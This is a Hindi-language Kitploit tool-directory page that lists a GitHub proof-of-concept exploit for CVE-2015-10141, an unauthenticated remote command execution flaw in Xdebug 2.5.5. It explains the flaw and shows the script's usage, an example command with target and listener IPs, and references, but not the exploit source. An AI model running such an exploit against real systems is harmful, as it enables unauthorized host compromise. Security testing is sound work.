Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2015-10141 — POC exploit for CVE-2015-10141 | Kitploit
उपकरण/GitHubGitHub/d3ext/cve-2015-10141
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubd3ext/cve-2015-10141

CVE-2015-10141

POC exploit for CVE-2015-10141

रिपॉजिटरी देखें
3191 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2015-10141

root@kitploit:~
# Exploit Title: xdebug Unauthenticated Command Execution
# Exploit Author: D3Ext
# Vendor Homepage: https://xdebug.org/
# Sofware Link: https://pecl.php.net/package/xdebug/2.5.5/windows
# Version: 2.5.5
# Tested on: Kali Linux 2025
# CVE: CVE-2015-10141

व्याख्या

Xdebug संस्करण 2.5.5 और इससे पहले के संस्करणों में, जो एक PHP डिबगिंग एक्सटेंशन है, एक अप्रमाणित OS कमांड इंजेक्शन भेद्यता मौजूद है। जब रिमोट डिबगिंग सक्षम होती है, तो Xdebug पोर्ट 9000 पर सुनता है और बिना प्रमाणीकरण के डिबगर प्रोटोकॉल कमांड स्वीकार करता है। एक हमलावर इस इंटरफ़ेस पर एक क्राफ्टेड eval कमांड भेजकर मनमाना PHP कोड निष्पादित कर सकता है, जो system() या passthru() जैसे सिस्टम-स्तरीय फ़ंक्शन को आह्वान कर सकता है। इसके परिणामस्वरूप वेब सर्वर उपयोगकर्ता के विशेषाधिकारों के तहत होस्ट का पूर्ण समझौता होता है।

उपयोग

root@kitploit:~
usage: CVE-2015-10141.py [-h] -u URL -l LHOST

CVE-2015-10141 - xdebug v2.5.5 RCE Exploit

options:
  -h, --help         show this help message and exit
  -u, --url URL      URL of the target
  -l, --lhost LHOST  LHOST to trigger the RCE

बस एक्सप्लॉइट को निष्पादित करें और एक PHP फ़ाइल जैसे index.php और लोकल होस्ट के साथ एक मान्य URL प्रदान करें। फिर एक्सप्लॉइट एक छद्म-टर्मिनल स्थापित करने का प्रयास करेगा जो आपको दूरस्थ रूप से कमांड निष्पादित करने की अनुमति देता है

root@kitploit:~
python3 exploit.py -u http://10.10.10.83/index.php -l 10.10.16.3

ध्यान रखें कि कुछ मामलों में आउटपुट बिल्कुल भी प्रतिबिंबित नहीं होगा और आपको केवल निष्पादित कमांड की पहली पंक्ति दिखाई देगी, यह स्क्रिप्ट की कोई समस्या नहीं है, भेद्यता इसी प्रकार काम करती है)

संदर्भ

root@kitploit:~
https://github.com/advisories/GHSA-267w-63f8-m896
https://www.exploit-db.com/exploits/44568
https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/
https://nvd.nist.gov/vuln/detail/CVE-2015-10141
https://www.wiz.io/vulnerability-database/cve/cve-2015-10141
https://feedly.com/cve/CVE-2015-10141
https://www.tenable.com/plugins/nessus/112210

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत है

कॉपीराइट © 2025, D3Ext

टूल डाउनलोड करें